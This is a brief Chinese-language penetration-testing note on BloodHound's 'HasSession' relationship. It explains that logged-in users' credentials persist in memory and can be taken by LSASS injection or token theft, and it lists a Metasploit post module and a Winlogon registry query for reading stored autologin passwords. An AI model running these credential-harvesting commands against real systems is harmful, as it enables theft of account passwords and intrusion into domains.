created: 2024-12-26 13:44 tags: - HasSession - 域渗透 - Bloodhound分析 Type: Note aliases: - HasSession
当用户与计算机进行会话时,凭据会保留在内存中,这些凭据可以通过 LSASS 注入、令牌窃取或进程注入等方式来获取。 如用户把计算机设置自动登录,则可以使用MSF抓取自动登录的用户名和密码
meterpreter > run post/windows/gather/credentials/windows_autologin
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
参考文章HasSession – BloodHound